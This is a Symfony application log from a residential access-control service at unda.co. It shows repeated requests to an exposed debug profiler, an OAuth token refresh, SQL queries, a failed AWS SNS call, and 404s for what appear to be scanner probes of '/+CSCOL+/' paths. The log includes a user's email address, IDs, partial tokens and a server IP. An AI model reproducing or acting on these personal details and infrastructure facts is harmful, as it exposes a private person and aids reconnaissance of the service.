[2025-12-20 00:27:06] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://unda.co/_profiler/search_bar?panel=db","method":"GET"} []
[2025-12-20 00:30:24] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"956458","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/956458?panel=router","method":"GET"} []
[2025-12-20 00:30:24] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?panel=router","method":"GET"} []
[2025-12-20 00:33:59] request.INFO: Matched route "homepage". {"route":"homepage","route_parameters":{"_controller":"AppBundle\\Controller\\DefaultController::indexAction","_route":"homepage"},"request_uri":"https://35.175.10.94/","method":"GET"} []
[2025-12-20 00:34:13] request.INFO: Matched route "homepage". {"route":"homepage","route_parameters":{"_controller":"AppBundle\\Controller\\DefaultController::indexAction","_route":"homepage"},"request_uri":"https://35.175.10.94/","method":"GET"} []
[2025-12-20 00:39:04] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /service/api-docs/"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /service/api-docs/\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-20 00:41:34] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"0409e5","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/0409e5?group=1&panel=db","method":"GET"} []
[2025-12-20 00:41:34] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?group=1&panel=db","method":"GET"} []
[2025-12-20 00:46:32] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"fb19b2","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/fb19b2?panel=config","method":"GET"} []
[2025-12-20 00:46:32] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?panel=config","method":"GET"} []
[2025-12-20 00:46:38] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"770c18","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/770c18","method":"GET"} []
[2025-12-20 00:46:38] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar","method":"GET"} []
[2025-12-20 00:48:19] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"bc8fa7","_route":"_profiler"},"request_uri":"https://unda.co/_profiler/bc8fa7","method":"GET"} []
[2025-12-20 00:48:19] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://unda.co/_profiler/search_bar","method":"GET"} []
[2025-12-20 00:52:06] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"a276d6","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/a276d6?panel=dump","method":"GET"} []
[2025-12-20 00:52:06] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?panel=dump","method":"GET"} []
[2025-12-20 00:55:04] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"44e4df","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/44e4df?panel=form","method":"GET"} []
[2025-12-20 00:55:04] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?panel=form","method":"GET"} []
[2025-12-20 00:57:12] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"025fac","_route":"_profiler"},"request_uri":"https://unda.co/_profiler/025fac?panel=db","method":"GET"} []
[2025-12-20 00:57:12] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://unda.co/_profiler/search_bar?panel=db","method":"GET"} []
[2025-12-20 00:57:54] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"a1bacb","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/a1bacb?panel=time","method":"GET"} []
[2025-12-20 00:57:54] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?panel=time","method":"GET"} []
[2025-12-20 01:00:37] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"7478c3","_route":"_profiler"},"request_uri":"https://unda.co/_profiler/7478c3?panel=cache","method":"GET"} []
[2025-12-20 01:00:37] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://unda.co/_profiler/search_bar?panel=cache","method":"GET"} []
[2025-12-20 01:02:07] request.INFO: Matched route "_profiler_search_results". {"route":"_profiler_search_results","route_parameters":{"_controller":"web_profiler.controller.profiler:searchResultsAction","token":"7735a8","_route":"_profiler_search_results"},"request_uri":"https://web.unda.co/_profiler/7735a8/search/results?limit=10&method=GET","method":"GET"} []
[2025-12-20 01:02:07] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://web.unda.co/_profiler/search_bar?limit=10&method=GET","method":"GET"} []
[2025-12-20 01:02:58] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"497d02","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/497d02?panel=config","method":"GET"} []
[2025-12-20 01:02:58] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?panel=config","method":"GET"} []
[2025-12-20 01:11:14] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /+CSCOL+/Java.jar"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /+CSCOL+/Java.jar\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-20 01:11:16] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /+CSCOL+/a1.jar"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /+CSCOL+/a1.jar\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-20 01:13:41] request.INFO: Matched route "oauth2_token". {"route":"oauth2_token","route_parameters":{"_controller":"Hona\\AuthBundle\\Controller\\OauthController::tokenAction","domain":"auth.unda.co","_route":"oauth2_token"},"request_uri":"https://auth.unda.co/oauth2/token","method":"POST"} []
[2025-12-20 01:13:41] php.INFO: User Deprecated: getEntityManager is deprecated since Symfony 2.1. Use getManager instead {"exception":"[object] (ErrorException(code: 0): User Deprecated: getEntityManager is deprecated since Symfony 2.1. Use getManager instead at /var/repositories/hona/vendor/doctrine/doctrine-bundle/Registry.php:62)"} []
[2025-12-20 01:13:41] doctrine.DEBUG: SELECT t0.client_id AS client_id_1, t0.token AS token_2, t0.expires_at AS expires_at_3, t0.scope AS scope_4, t0.user_id AS user_id_5, t0.data AS data_6 FROM refresh_token t0 WHERE t0.token = ? LIMIT 1 ["e150f29e1a2b6ef57e5b887f1b [...]"] []
[2025-12-20 01:13:41] doctrine.DEBUG: "START TRANSACTION" [] []
[2025-12-20 01:13:41] doctrine.DEBUG: INSERT INTO access_token (client_id, token, expires_at, scope, user_id, data) VALUES (?, ?, ?, ?, ?, ?) {"1":0,"2":"d0bc4f7ba7c10ddb1815706338 [...]","3":"2025-12-20 01:43:41","4":"","5":398,"6":"[]"} []
[2025-12-20 01:13:41] doctrine.DEBUG: "COMMIT" [] []
[2025-12-20 01:13:41] doctrine.DEBUG: "START TRANSACTION" [] []
[2025-12-20 01:13:41] doctrine.DEBUG: INSERT INTO refresh_token (client_id, token, expires_at, scope, user_id, data) VALUES (?, ?, ?, ?, ?, ?) {"1":0,"2":"3d8ae38adb2908af83e0a5c5e4 [...]","3":"2026-02-18 01:13:41","4":"","5":398,"6":"[]"} []
[2025-12-20 01:13:41] doctrine.DEBUG: "COMMIT" [] []
[2025-12-20 01:13:41] doctrine.DEBUG: "START TRANSACTION" [] []
[2025-12-20 01:13:41] doctrine.DEBUG: DELETE FROM refresh_token WHERE client_id = ? AND token = ? [0,"e150f29e1a2b6ef57e5b887f1b [...]"] []
[2025-12-20 01:13:41] doctrine.DEBUG: "COMMIT" [] []
[2025-12-20 01:13:42] request.INFO: Matched route "me_get". {"route":"me_get","route_parameters":{"_controller":"Hona\\ApiBundle\\Controller\\MeController::meGETAction","domain":"api.unda.co","_route":"me_get"},"request_uri":"https://api.unda.co/me?fields=control_gate%2Caddress%2Cnotification_setting","method":"GET"} []
[2025-12-20 01:13:42] security.DEBUG: Checking for guard authentication credentials. {"firewall_key":"bearer_presence","authenticators":1} []
[2025-12-20 01:13:42] security.DEBUG: Checking support on guard authenticator. {"firewall_key":"bearer_presence","authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
[2025-12-20 01:13:42] security.DEBUG: Calling getCredentials() on guard authenticator. {"firewall_key":"bearer_presence","authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
[2025-12-20 01:13:42] security.DEBUG: Passing guard token information to the GuardAuthenticationProvider {"firewall_key":"bearer_presence","authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
[2025-12-20 01:13:42] doctrine.DEBUG: SELECT t0.client_id AS client_id_1, t0.token AS token_2, t0.expires_at AS expires_at_3, t0.scope AS scope_4, t0.user_id AS user_id_5, t0.data AS data_6 FROM access_token t0 WHERE t0.token = ? LIMIT 1 ["d0bc4f7ba7c10ddb1815706338 [...]"] []
[2025-12-20 01:13:42] doctrine.DEBUG: SELECT t0.id AS id_1, t0.uuid AS uuid_2, t0.status AS status_3, t0.date_created AS date_created_4, t0.date_modified AS date_modified_5, t0.name AS name_6, t0.last_name AS last_name_7, t0.email AS email_8, t0.password AS password_9, t0.media_path AS media_path_10, t0.thumb_path AS thumb_path_11, t0.curp AS curp_12, t0.phone AS phone_13, t0.email_verification AS email_verification_14, t0.phone_verification AS phone_verification_15 FROM user t0 WHERE t0.id = ? LIMIT 1 [398] []
[2025-12-20 01:13:42] security.INFO: Guard authentication successful! {"token":"[object] (Symfony\\Component\\Security\\Guard\\Token\\PostAuthenticationGuardToken: PostAuthenticationGuardToken(user=\"carlosyadri25@gmail.com\", authenticated=true, roles=\"ROLE_USER\"))","authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
[2025-12-20 01:13:42] security.DEBUG: Guard authenticator set no success response: request continues. {"authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
[2025-12-20 01:13:42] security.DEBUG: Remember me skipped: it is not configured for the firewall. {"authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
[2025-12-20 01:13:42] doctrine.DEBUG: SELECT t0.id AS id_1, t0.uuid AS uuid_2, t0.status AS status_3, t0.date_created AS date_created_4, t0.date_modified AS date_modified_5, t0.name AS name_6, t0.last_name AS last_name_7, t0.email AS email_8, t0.password AS password_9, t0.media_path AS media_path_10, t0.thumb_path AS thumb_path_11, t0.curp AS curp_12, t0.phone AS phone_13, t0.email_verification AS email_verification_14, t0.phone_verification AS phone_verification_15 FROM user t0 WHERE t0.uuid = ? LIMIT 1 ["914a4df2-219f-4106-974f-ce [...]"] []
[2025-12-20 01:13:42] doctrine.DEBUG: SELECT c0_.id AS id_0, c0_.uuid AS uuid_1, c0_.status AS status_2, c0_.date_created AS date_created_3, c0_.date_modified AS date_modified_4, c0_.name AS name_5, c0_.residential_id AS residential_id_6, u1_.permission AS permission_7 FROM control_gate c0_ INNER JOIN user_has_control_gate u1_ ON ((u1_.control_gate_id = c0_.id) AND (u1_.user_id = ?) AND (u1_.status = ?)) LIMIT 10 OFFSET 0 [398,1] []
[2025-12-20 01:13:42] doctrine.DEBUG: SELECT a0_.id AS id_0, a0_.uuid AS uuid_1, a0_.status AS status_2, a0_.date_created AS date_created_3, a0_.date_modified AS date_modified_4, a0_.name AS name_5, a0_.street AS street_6, a0_.outdoor_number AS outdoor_number_7, a0_.interior_number AS interior_number_8, a0_.residential_id AS residential_id_9, u1_.permission AS permission_10, u1_.color AS color_11 FROM address a0_ INNER JOIN user_has_address u1_ ON ((u1_.address_id = a0_.id) AND (u1_.user_id = ?) AND (u1_.status = ?)) LIMIT 10 OFFSET 0 [398,1] []
[2025-12-20 01:13:42] doctrine.DEBUG: SELECT t0.id AS id_1, t0.uuid AS uuid_2, t0.status AS status_3, t0.date_created AS date_created_4, t0.date_modified AS date_modified_5, t0.name AS name_6, t0.id_rule AS id_rule_7, t0.plate_rule AS plate_rule_8, t0.cp AS cp_9, t0.neighborhood AS neighborhood_10, t0.country AS country_11, t0.state AS state_12, t0.city AS city_13 FROM residential t0 WHERE t0.id = ? [15] []
[2025-12-20 01:13:42] doctrine.DEBUG: SELECT t0.id AS id_1, t0.uuid AS uuid_2, t0.status AS status_3, t0.date_created AS date_created_4, t0.date_modified AS date_modified_5, t0.name AS name_6, t0.street AS street_7, t0.outdoor_number AS outdoor_number_8, t0.interior_number AS interior_number_9, t0.residential_id AS residential_id_10 FROM address t0 WHERE t0.uuid = ? LIMIT 1 ["c95c459d-212c-4555-98e9-59 [...]"] []
[2025-12-20 01:13:42] doctrine.DEBUG: SELECT t0.id AS id_1, t0.uuid AS uuid_2, t0.status AS status_3, t0.date_created AS date_created_4, t0.date_modified AS date_modified_5, t0.other_user AS other_user_6, t0.news AS news_7, t0.new_events AS new_events_8, t0.invited_entry AS invited_entry_9, t0.invited_confirmation AS invited_confirmation_10, t0.user_id AS user_id_11, t0.address_id AS address_id_12, t0.control_gate_id AS control_gate_id_13 FROM notification_setting t0 WHERE t0.user_id = ? AND t0.address_id = ? LIMIT 1 [398,274] []
[2025-12-20 01:13:42] security.DEBUG: Stored the security token in the session. {"key":"_security_bearer_presence"} []
[2025-12-20 01:13:42] request.INFO: Matched route "address_get_uuid_invitation". {"route":"address_get_uuid_invitation","route_parameters":{"size":"10","page":"0","_controller":"Hona\\ApiBundle\\Controller\\AddressController::addressInvitationGETAction","domain":"api.unda.co","uuid":"c95c459d-212c-4555-98e9-59cee00445e5","_route":"address_get_uuid_invitation"},"request_uri":"https://api.unda.co/address/c95c459d-212c-4555-98e9-59cee00445e5/invitation/10/0?order=desc","method":"GET"} []
[2025-12-20 01:13:42] security.DEBUG: Checking for guard authentication credentials. {"firewall_key":"bearer_presence","authenticators":1} []
[2025-12-20 01:13:42] security.DEBUG: Checking support on guard authenticator. {"firewall_key":"bearer_presence","authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
[2025-12-20 01:13:42] security.DEBUG: Calling getCredentials() on guard authenticator. {"firewall_key":"bearer_presence","authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
[2025-12-20 01:13:42] security.DEBUG: Passing guard token information to the GuardAuthenticationProvider {"firewall_key":"bearer_presence","authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
[2025-12-20 01:13:42] doctrine.DEBUG: SELECT t0.client_id AS client_id_1, t0.token AS token_2, t0.expires_at AS expires_at_3, t0.scope AS scope_4, t0.user_id AS user_id_5, t0.data AS data_6 FROM access_token t0 WHERE t0.token = ? LIMIT 1 ["d0bc4f7ba7c10ddb1815706338 [...]"] []
[2025-12-20 01:13:42] doctrine.DEBUG: SELECT t0.id AS id_1, t0.uuid AS uuid_2, t0.status AS status_3, t0.date_created AS date_created_4, t0.date_modified AS date_modified_5, t0.name AS name_6, t0.last_name AS last_name_7, t0.email AS email_8, t0.password AS password_9, t0.media_path AS media_path_10, t0.thumb_path AS thumb_path_11, t0.curp AS curp_12, t0.phone AS phone_13, t0.email_verification AS email_verification_14, t0.phone_verification AS phone_verification_15 FROM user t0 WHERE t0.id = ? LIMIT 1 [398] []
[2025-12-20 01:13:42] security.INFO: Guard authentication successful! {"token":"[object] (Symfony\\Component\\Security\\Guard\\Token\\PostAuthenticationGuardToken: PostAuthenticationGuardToken(user=\"carlosyadri25@gmail.com\", authenticated=true, roles=\"ROLE_USER\"))","authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
[2025-12-20 01:13:42] security.DEBUG: Guard authenticator set no success response: request continues. {"authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
[2025-12-20 01:13:42] security.DEBUG: Remember me skipped: it is not configured for the firewall. {"authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
[2025-12-20 01:13:42] doctrine.DEBUG: SELECT t0.id AS id_1, t0.uuid AS uuid_2, t0.status AS status_3, t0.date_created AS date_created_4, t0.date_modified AS date_modified_5, t0.name AS name_6, t0.street AS street_7, t0.outdoor_number AS outdoor_number_8, t0.interior_number AS interior_number_9, t0.residential_id AS residential_id_10 FROM address t0 WHERE t0.uuid = ? LIMIT 1 ["c95c459d-212c-4555-98e9-59 [...]"] []
[2025-12-20 01:13:42] doctrine.DEBUG: SELECT t0.status AS status_1, t0.date_created AS date_created_2, t0.date_modified AS date_modified_3, t0.user_id AS user_id_4, t0.address_id AS address_id_5, t0.parent_id AS parent_id_6, t0.permission AS permission_7, t0.color AS color_8, t0.rent AS rent_9 FROM user_has_address t0 WHERE t0.user_id = ? AND t0.address_id = ? AND t0.status = ? [398,274,1] []
[2025-12-20 01:13:42] doctrine.DEBUG: SELECT t0.id AS id_1, t0.uuid AS uuid_2, t0.status AS status_3, t0.date_created AS date_created_4, t0.date_modified AS date_modified_5, t0.name AS name_6, t0.street AS street_7, t0.outdoor_number AS outdoor_number_8, t0.interior_number AS interior_number_9, t0.residential_id AS residential_id_10 FROM address t0 WHERE t0.uuid = ? LIMIT 1 ["c95c459d-212c-4555-98e9-59 [...]"] []
[2025-12-20 01:13:42] doctrine.DEBUG: SELECT t0.id AS id_1, t0.uuid AS uuid_2, t0.status AS status_3, t0.date_created AS date_created_4, t0.date_modified AS date_modified_5, t0.name AS name_6, t0.id_rule AS id_rule_7, t0.plate_rule AS plate_rule_8, t0.cp AS cp_9, t0.neighborhood AS neighborhood_10, t0.country AS country_11, t0.state AS state_12, t0.city AS city_13 FROM residential t0 WHERE t0.id = ? LIMIT 1 [15] []
[2025-12-20 01:13:42] doctrine.DEBUG: SELECT i0_.id AS id_0, i0_.uuid AS uuid_1, i0_.status AS status_2, i0_.date_created AS date_created_3, i0_.date_modified AS date_modified_4, i0_.name AS name_5, i0_.last_name AS last_name_6, i0_.code AS code_7, i0_.image_code_path AS image_code_path_8, i0_.type AS type_9, i0_.subtype AS subtype_10, i0_.date_invitation AS date_invitation_11, i0_.date_start AS date_start_12, i0_.date_end AS date_end_13, i0_.event_id AS event_id_14, i0_.address_id AS address_id_15, i0_.user_id AS user_id_16 FROM invitation i0_ WHERE (i0_.address_id = ?) AND (i0_.status = ?) ORDER BY i0_.date_invitation DESC LIMIT 10 OFFSET 0 [274,1] []
[2025-12-20 01:13:42] doctrine.DEBUG: SELECT count(i0_.id) AS sclr_0 FROM invitation i0_ WHERE (i0_.address_id = ?) AND (i0_.status = ?) [274,1] []
[2025-12-20 01:13:42] request.INFO: Matched route "device_post_uuid". {"route":"device_post_uuid","route_parameters":{"_controller":"Hona\\ApiBundle\\Controller\\DeviceController::devicePOSTAction","domain":"api.unda.co","_route":"device_post_uuid"},"request_uri":"https://api.unda.co/device","method":"POST"} []
[2025-12-20 01:13:42] doctrine.DEBUG: SELECT t0.id AS id_1, t0.uuid AS uuid_2, t0.status AS status_3, t0.date_created AS date_created_4, t0.date_modified AS date_modified_5, t0.name AS name_6, t0.last_name AS last_name_7, t0.email AS email_8, t0.password AS password_9, t0.media_path AS media_path_10, t0.thumb_path AS thumb_path_11, t0.curp AS curp_12, t0.phone AS phone_13, t0.email_verification AS email_verification_14, t0.phone_verification AS phone_verification_15 FROM user t0 WHERE t0.id = ? LIMIT 1 [398] []
[2025-12-20 01:13:42] security.DEBUG: Checking for guard authentication credentials. {"firewall_key":"bearer_presence","authenticators":1} []
[2025-12-20 01:13:42] security.DEBUG: Checking support on guard authenticator. {"firewall_key":"bearer_presence","authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
[2025-12-20 01:13:42] security.DEBUG: Calling getCredentials() on guard authenticator. {"firewall_key":"bearer_presence","authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
[2025-12-20 01:13:42] security.DEBUG: Passing guard token information to the GuardAuthenticationProvider {"firewall_key":"bearer_presence","authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
[2025-12-20 01:13:42] security.DEBUG: Stored the security token in the session. {"key":"_security_bearer_presence"} []
[2025-12-20 01:13:42] doctrine.DEBUG: SELECT t0.client_id AS client_id_1, t0.token AS token_2, t0.expires_at AS expires_at_3, t0.scope AS scope_4, t0.user_id AS user_id_5, t0.data AS data_6 FROM access_token t0 WHERE t0.token = ? LIMIT 1 ["d0bc4f7ba7c10ddb1815706338 [...]"] []
[2025-12-20 01:13:42] doctrine.DEBUG: SELECT t0.id AS id_1, t0.uuid AS uuid_2, t0.status AS status_3, t0.date_created AS date_created_4, t0.date_modified AS date_modified_5, t0.name AS name_6, t0.last_name AS last_name_7, t0.email AS email_8, t0.password AS password_9, t0.media_path AS media_path_10, t0.thumb_path AS thumb_path_11, t0.curp AS curp_12, t0.phone AS phone_13, t0.email_verification AS email_verification_14, t0.phone_verification AS phone_verification_15 FROM user t0 WHERE t0.id = ? LIMIT 1 [398] []
[2025-12-20 01:13:42] security.INFO: Guard authentication successful! {"token":"[object] (Symfony\\Component\\Security\\Guard\\Token\\PostAuthenticationGuardToken: PostAuthenticationGuardToken(user=\"carlosyadri25@gmail.com\", authenticated=true, roles=\"ROLE_USER\"))","authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
[2025-12-20 01:13:42] security.DEBUG: Guard authenticator set no success response: request continues. {"authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
[2025-12-20 01:13:42] security.DEBUG: Remember me skipped: it is not configured for the firewall. {"authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
[2025-12-20 01:13:42] doctrine.DEBUG: SELECT t0.id AS id_1, t0.uuid AS uuid_2, t0.status AS status_3, t0.date_created AS date_created_4, t0.date_modified AS date_modified_5, t0.guid AS guid_6, t0.endpoint_arn AS endpoint_arn_7, t0.token AS token_8, t0.identifier AS identifier_9, t0.model AS model_10, t0.os AS os_11, t0.app_version AS app_version_12, t0.arn_status AS arn_status_13, t0.type AS type_14, t0.app AS app_15, t0.user_id AS user_id_16 FROM device t0 WHERE t0.identifier = ? AND t0.type = ? AND t0.user_id = ? LIMIT 1 ["450EEF16-4822-4D9B-B6A0-EF [...]",1,398] []
[2025-12-20 01:13:42] request.CRITICAL: Uncaught PHP Exception Aws\Sns\Exception\SnsException: "Error executing "CreatePlatformEndpoint" on "https://sns.us-east-1.amazonaws.com"; AWS HTTP error: Client error: `POST https://sns.us-east-1.amazonaws.com` resulted in a `403 Forbidden` response: <ErrorResponse xmlns="http://sns.amazonaws.com/doc/2010-03-31/"> <Error> <Type>Sender</Type> <Code>InvalidClie (truncated...) InvalidClientTokenId (client): The security token included in the request is invalid. - <ErrorResponse xmlns="http://sns.amazonaws.com/doc/2010-03-31/"> <Error> <Type>Sender</Type> <Code>InvalidClientTokenId</Code> <Message>The security token included in the request is invalid.</Message> </Error> <RequestId>77a869a9-ff34-5e79-965d-081605b2cfe9</RequestId> </ErrorResponse> " at /var/repositories/hona/vendor/aws/aws-sdk-php/src/WrappedHttpHandler.php line 195 {"exception":"[object] (Aws\\Sns\\Exception\\SnsException(code: 0): Error executing \"CreatePlatformEndpoint\" on \"https://sns.us-east-1.amazonaws.com\"; AWS HTTP error: Client error: `POST https://sns.us-east-1.amazonaws.com` resulted in a `403 Forbidden` response:\n<ErrorResponse xmlns=\"http://sns.amazonaws.com/doc/2010-03-31/\">\n <Error>\n <Type>Sender</Type>\n <Code>InvalidClie (truncated...)\n InvalidClientTokenId (client): The security token included in the request is invalid. - <ErrorResponse xmlns=\"http://sns.amazonaws.com/doc/2010-03-31/\">\n <Error>\n <Type>Sender</Type>\n <Code>InvalidClientTokenId</Code>\n <Message>The security token included in the request is invalid.</Message>\n </Error>\n <RequestId>77a869a9-ff34-5e79-965d-081605b2cfe9</RequestId>\n</ErrorResponse>\n at /var/repositories/hona/vendor/aws/aws-sdk-php/src/WrappedHttpHandler.php:195, GuzzleHttp\\Exception\\ClientException(code: 403): Client error: `POST https://sns.us-east-1.amazonaws.com` resulted in a `403 Forbidden` response:\n<ErrorResponse xmlns=\"http://sns.amazonaws.com/doc/2010-03-31/\">\n <Error>\n <Type>Sender</Type>\n <Code>InvalidClie (truncated...)\n at /var/repositories/hona/vendor/guzzlehttp/guzzle/src/Exception/RequestException.php:113)"} []
[2025-12-20 01:13:42] security.DEBUG: Stored the security token in the session. {"key":"_security_bearer_presence"} []
[2025-12-20 01:13:47] request.INFO: Matched route "residential_get_uuid_providers". {"route":"residential_get_uuid_providers","route_parameters":{"_controller":"Hona\\ApiBundle\\Controller\\ResidentialController::residentialProvidersGETAction","domain":"api.unda.co","uuid":"c95c459d-212c-4555-98e9-59cee00445e5","_route":"residential_get_uuid_providers"},"request_uri":"https://api.unda.co/residential/c95c459d-212c-4555-98e9-59cee00445e5/providers","method":"GET"} []
[2025-12-20 01:13:47] security.DEBUG: Read existing security token from the session. {"key":"_security_bearer_presence","token_class":"Symfony\\Component\\Security\\Guard\\Token\\PostAuthenticationGuardToken"} []
[2025-12-20 01:13:47] doctrine.DEBUG: SELECT t0.client_id AS client_id_1, t0.token AS token_2, t0.expires_at AS expires_at_3, t0.scope AS scope_4, t0.user_id AS user_id_5, t0.data AS data_6 FROM access_token t0 WHERE t0.token = ? LIMIT 1 ["d0bc4f7ba7c10ddb1815706338 [...]"] []
[2025-12-20 01:13:47] doctrine.DEBUG: SELECT t0.id AS id_1, t0.uuid AS uuid_2, t0.status AS status_3, t0.date_created AS date_created_4, t0.date_modified AS date_modified_5, t0.name AS name_6, t0.last_name AS last_name_7, t0.email AS email_8, t0.password AS password_9, t0.media_path AS media_path_10, t0.thumb_path AS thumb_path_11, t0.curp AS curp_12, t0.phone AS phone_13, t0.email_verification AS email_verification_14, t0.phone_verification AS phone_verification_15 FROM user t0 WHERE t0.id = ? LIMIT 1 [398] []
[2025-12-20 01:13:47] security.DEBUG: Cannot refresh token because user has changed. {"username":"carlosyadri25@gmail.com","provider":"Hona\\ApiBundle\\Security\\ApiUserProvider"} []
[2025-12-20 01:13:47] security.DEBUG: Token was deauthenticated after trying to refresh it. [] []
[2025-12-20 01:13:47] security.DEBUG: Checking for guard authentication credentials. {"firewall_key":"bearer_presence","authenticators":1} []
